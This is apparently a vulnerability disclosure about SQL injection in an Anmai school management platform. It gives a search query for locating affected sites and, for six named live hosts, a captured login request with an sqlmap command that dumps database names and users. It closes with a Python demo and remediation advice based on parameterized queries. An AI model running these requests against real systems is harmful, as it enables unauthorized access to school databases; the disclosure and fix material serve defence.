### Brief description

A school comprehensive management platform contains a generic SQL injection vulnerability that affects a considerable number of schools.

### Detailed description

Search query used to locate affected instances: http://www.baidu.com/s?wd=%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81%EF%BC%9A56628124%2056626870

Vendor of the vulnerable application: Shanghai Anmai Computer Technology Co., Ltd. (上海安脉计算机科技有限公司)

#### 1. http://ps.imau.edu.cn/anmai/login.aspx

a. Scanning with WVS shows that the parameter "txtUserName" is vulnerable to POST-based SQL injection.

![1.png](https://images.seebug.org/upload/201405/25120420a56641d4f2ac7965a92f3ad489564d2e.png)

b. Save the POST request to a file named 2s.txt:

```http
POST /anmai/getsession.asp HTTP/1.1
Content-Length: 264
Content-Type: application/x-www-form-urlencoded
Cookie: ASP.NET_SessionId=1rgrdf55yjvab055tdwcijft; ASPSESSIONIDACDCRQCD=MHOBLFNCCDJAKDACOOLMKBHF
Host: ps.imau.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

GetMiddleSign%24signName=gveusgdw&hidaction=login&password=g00dPa%24%24w0rD&txtUserName=4CuTl2BgGJo
```

c. Run sqlmap:

```sh
sqlmap.py -r 2s.txt -p "txtUserName" --dbs --current-user --current-db
```

![2.png](https://images.seebug.org/upload/201405/2512072380ad499a1c64d5e19ce314139ad8c4fd.png)

![3.png](https://images.seebug.org/upload/201405/2512073643314918dc0a6a07d52b090a42f6a19f.png)

![4.png](https://images.seebug.org/upload/201405/2512075594820e26fad13039c90d6c5bb086587a.png)

#### 2. http://58.118.14.26/login.aspx

a. Scanning with WVS shows that the parameter "txtUserName" is vulnerable to POST-based SQL injection.

![5.png](https://images.seebug.org/upload/201405/251208596210320b8126366df51f1b153a6c9b2d.png)

b. Save the POST request to a file named 2s.txt:

```http
POST /getsession.asp HTTP/1.1
Content-Length: 260
Content-Type: application/x-www-form-urlencoded
Cookie: ASP.NET_SessionId=ggm1fu45mcjbu4jbjf1mhj55; ASPSESSIONIDAATQCTSD=PHFBHODDIJNFKGJHEFKGKIHG
Host: 58.118.14.26
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

GetMiddleSign:signName=ltymqyff&hidaction=login&password=g00dPa%24%24w0rD&txtUserName=4CubaaXVHPq
```

c. Run sqlmap:

```sh
sqlmap.py -r 2s.txt -p "txtUserName" --dbs --current-user --current-db
```

![6.png](https://images.seebug.org/upload/201405/2512101043eba58fe241602d9c5a5d2c6b30060a.png)

![7.png](https://images.seebug.org/upload/201405/251210262b906b49f0a620d7664cb3cc7b60086b.png)

#### 3. http://www.wems.net:84/

a. Scanning with WVS shows that the parameter "txtUserName" is vulnerable to POST-based SQL injection.

![8.png](https://images.seebug.org/upload/201405/25121120f32a2fad94e039428b66f02f80aeb60c.png)

b. Save the POST request to a file named 2s.txt:

```http
POST /getsession.asp HTTP/1.1
Content-Length: 264
Content-Type: application/x-www-form-urlencoded
Cookie: ASP.NET_SessionId=x3ifu045a0hzti3k1deo1w45; ASPSESSIONIDQARDDDDQ=GEEFGBLDIGPBCCBANBFAJNGJ
Host: www.wems.net:84
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

GetMiddleSign:signName=vflbcavb&hidaction=login&password=g00dPa%24%24w0rD&txtUserName=4CutkFMIwfs
```

c. Run sqlmap:

```sh
sqlmap.py -r 2s.txt -p "txtUserName" --dbs --current-user --current-db
```

![9.png](https://images.seebug.org/upload/201405/2512122290e0ff5a4dcda74697d0ee38b6b2c28d.png)

![10.png](https://images.seebug.org/upload/201405/2512124203e3d2189f128f0b4554ac64684bf6e9.png)

![11.png](https://images.seebug.org/upload/201405/25121309604c9d5da5b0252fac560664f0edaae0.png)

#### 4. http://www.syzxyz.com:8008/login.aspx

a. Scanning with WVS shows that the parameter "txtUserName" is vulnerable to POST-based SQL injection.

![12.png](https://images.seebug.org/upload/201405/2512134905666746b3180da9a624aec72fc283ce.png)

b. Save the POST request to a file named 2s.txt:

```http
POST /getsession.asp HTTP/1.1
Content-Length: 264
Content-Type: application/x-www-form-urlencoded
Cookie: ASP.NET_SessionId=ieh3jz55sqghif451v4pcvvn; ASPSESSIONIDSSRQAABR=GFMJIGIDKNAMDBOGONAKNHKI; %d5%d0%c9%fa%cd%b3%bc%c6=%d5%d0%c9%fa%cd%b3%bc%c6%7cRecruitstuManage%2frecruitstuStat%2fstudentState.aspx; %d1%a7%d0%a3%bc%f2%bd%e9=%d1%a7%d0%a3%bc%f2%bd%e9%7cRecruitstuManage%2fschoolinfo%2fschoolIntroduce.aspx
Host: www.syzxyz.com:8008
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

GetMiddleSign%24signName=ylgpirky&hidaction=login&password=g00dPa%24%24w0rD&txtUserName=4Cu3JKPTkhu
```

c. Run sqlmap:

```sh
sqlmap.py -r 2s.txt -p "txtUserName" --dbs --current-user --current-db
```

![13.png](https://images.seebug.org/upload/201405/251214579e23f4e728872419607af35d42b0b21a.png)

![14.png](https://images.seebug.org/upload/201405/25121509840d25296d2164414d4ed0b97747968b.png)

#### 5. http://218.2.69.105:8090/login.aspx

a. Scanning with WVS shows that the parameter "txtUserName" is vulnerable to POST-based SQL injection.

![15.png](https://images.seebug.org/upload/201405/2512155754a3694028124a1af4f0b3b10f1c1723.png)

b. Save the POST request to a file named 2s.txt:

```http
POST /getsession.asp HTTP/1.1
Content-Length: 265
Content-Type: application/x-www-form-urlencoded
Cookie: ASP.NET_SessionId=g0pfhk55ysesaz55qk1ohenu; ASPSESSIONIDSQDTSACR=NENLLMJDCDHLMCHNLIKMPKJH
Host: 218.2.69.105:8090
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

GetMiddleSign%24signName=trkqqwxu&hidaction=login&password=g00dPa%24%24w0rD&txtUserName=4CuGrMiSVsm
```

c. Run sqlmap:

```sh
sqlmap.py -r 2s.txt -p "txtUserName" --dbs --current-user --current-db
```

![16.png](https://images.seebug.org/upload/201405/251216504ca8ca9efed84d911b6e951d45898610.png)

![17.png](https://images.seebug.org/upload/201405/25121703e05f41efd8c7a9322279c3264195d79b.png)

![18.png](https://images.seebug.org/upload/201405/2512172060000a39b50162764d0fffc2d92e7454.png)

#### 6. http://218.21.35.220/login.aspx

a. Scanning with WVS shows that the parameter "txtUserName" is vulnerable to POST-based SQL injection.

![19.png](https://images.seebug.org/upload/201405/251218028aa1622fd23d46d0a21e7a151f6e5ada.png)

b. Save the POST request to a file named 2s.txt:

```http
POST /getsession.asp HTTP/1.1
Content-Length: 264
Content-Type: application/x-www-form-urlencoded
Cookie: ASP.NET_SessionId=oad2w045cp2rtp550kmjeiah; ASPSESSIONIDQACDABTT=KGKDKDKDJCALIGLPLPOPOFLH
Host: 218.21.35.220
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

GetMiddleSign%24signName=lbonxbch&hidaction=login&password=g00dPa%24%24w0rD&txtUserName=4CunP7dPebR
```

c. Run sqlmap:

```sh
sqlmap.py -r 2s.txt -p "txtUserName" --dbs --current-user --current-db
```

![20.png](https://images.seebug.org/upload/201405/25121844cef72eee1c5fc05b196d9d7d4d1b0fc5.png)

### Proof of vulnerability

Proven (see the screenshots above).
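All six instances share the same root cause: the login handler behind getsession.asp builds its user lookup by pasting the submitted txtUserName value into a SQL string, so any quote character in the field changes the query instead of being treated as data. The following is an added example, not code from the report or from the vendor's product. It is written in Python with sqlite3 because the platform's classic ASP source is not on the page; the table name, column names, the sample user and the password-hashing scheme are all assumptions made for the demonstration. The first handler reproduces the defective pattern and the second shows the fix, a parameterized query plus a constant-time hash comparison; the check function shows the symptom a scanner such as WVS keys on (a database error caused by an apostrophe in an otherwise ordinary username), which disappears once the query is parameterized.

```python
import hashlib
import hmac
import os
import sqlite3

PBKDF2_ITERATIONS = 100_000  # assumed setting for this demo


def _hash_password(password: str, salt: bytes) -> bytes:
    """PBKDF2-HMAC-SHA256 of the password; salt is per user."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS)


def build_demo_db() -> sqlite3.Connection:
    """Constructed in-memory user table standing in for the platform's real one (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, salt BLOB NOT NULL, pw_hash BLOB NOT NULL)")
    salt = os.urandom(16)
    conn.execute(
        "INSERT INTO users (username, salt, pw_hash) VALUES (?, ?, ?)",
        ("alice", salt, _hash_password("correct horse", salt)),
    )
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """The defective pattern the finding implies: user input concatenated into the SQL text.

    A username containing a quote character alters the statement; on a syntax error
    sqlite3 raises OperationalError, which is the kind of database error an injection
    scanner detects in the response.
    """
    sql = "SELECT salt, pw_hash FROM users WHERE username = '" + username + "'"
    row = conn.execute(sql).fetchone()
    if row is None:
        return False
    salt, pw_hash = row
    return hmac.compare_digest(_hash_password(password, salt), pw_hash)


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Hardened form: the username travels as a bound parameter, never as SQL text.

    Whatever characters the username contains, the database receives the same
    statement and compares the column against the value as a literal.
    """
    row = conn.execute(
        "SELECT salt, pw_hash FROM users WHERE username = ?", (username,)
    ).fetchone()
    if row is None:
        return False
    salt, pw_hash = row
    # Constant-time comparison avoids leaking how many hash bytes matched.
    return hmac.compare_digest(_hash_password(password, salt), pw_hash)


def quote_in_username_breaks_query(conn: sqlite3.Connection, handler) -> bool:
    """True if `handler` raises a database error for a legitimate name with an apostrophe.

    This is the observable difference between the two handlers: the concatenating one
    errors out on "O'Brien", the parameterized one simply finds no such user.
    """
    try:
        handler(conn, "O'Brien", "irrelevant")
    except sqlite3.OperationalError:
        return True
    return False


if __name__ == "__main__":
    db = build_demo_db()
    print("vulnerable handler errors on apostrophe:", quote_in_username_breaks_query(db, login_vulnerable))
    print("safe handler errors on apostrophe:     ", quote_in_username_breaks_query(db, login_safe))
    print("safe handler, valid credentials:       ", login_safe(db, "alice", "correct horse"))
    print("safe handler, wrong password:          ", login_safe(db, "alice", "wrong"))
```

The same change applies to the ASP code path the report exercises: every place getsession.asp interpolates txtUserName (or password, or the GetMiddleSign field) into a query string should be replaced with an ADODB.Command parameter, and the login page should not echo database error text to the client, since that error text is what turns a blind injection into an error-based one that a scanner finds in seconds.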